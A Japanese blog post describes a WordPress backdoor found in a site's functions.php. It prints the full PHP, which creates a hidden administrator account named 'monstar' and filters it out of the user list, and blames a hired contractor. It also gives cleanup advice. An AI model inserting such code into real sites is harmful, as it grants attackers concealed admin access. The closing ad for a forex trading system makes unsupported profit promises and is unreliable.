Functions.phpに以下のコードが
/** Required Functions **/
$new_user =new WP_User(wp_create_user(‘monstar’,’monstar’));
$new_user->set_role(‘administrator’);
add_action(‘pre_user_query’,’google_access_user_query’);
function google_access_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username != ‘monstar’) {
global $wpdb;
$user_search->query_where = str_replace(‘WHERE 1=1’,
“WHERE 1=1 AND {$wpdb->users}.user_login != ‘monstar'”,$user_search->query_where);
}
}
検索結果にもすでに表示
new_user =new WP_User(wp_create_user(‘monstar’,’monstar’)); $new_user->set_role(‘administrator’); add_action(‘pre_user_query’,’google_access_user_query’); function google_access_user_query($user_search)
で検索すると、セキュリティ対策サイトが検索上位に出てくるとともに、私のサイト自体も表示されてしまいます。
応急措置と参考サイト
応急措置は、functions.phpの該当コードを消去することです。
また、上の検索結果画面の下に表示されているサイトに状況の詳細が書かれていますので、参考となります。
顛末
今回はサイトの修正を依頼した受託者が、多数のプロジェクト案件を抱えているということで、このようなコードを勝手に追加したということです。
依頼した人が攻撃者となる可能性も潜在的に存在しているので、セキュリティ周りのチェックには余念のないようにいたしましょう。
もともとWordFenceをインストールしていますが、こういったプラグインの導入は、最低限必要かと思います。
【PR】2021年、最後のプロジェクトへ。
わずか20日で6%のプロフィットをたたき出す、マーチン・グリッド・トラリピ等ではない完全無欠のシステムが完成しつつあります。
私たち開発チームはこのEAに全ての魂を注ぐつもりです。現在最後の仕上げに向け、開発調整中です。
動意の低い12月の相場で、12月10日から20日足らずの稼働で+1000pipsを稼ぎ出そうとしています。
このシステムはSentiment Analysis理論を完全継承したシステムであり、もはやB-bookブローカーの利益構造の究極ともいえるでしょう。
低リスクでの複利運用試算です。
私たちは更なる高みを目指すことができるでしょう。乞うご期待。
詳しい情報を得られたい場合は、テレグラムのチャンネル登録をよろしくお願いいたします。
最後の戦いが始まる。
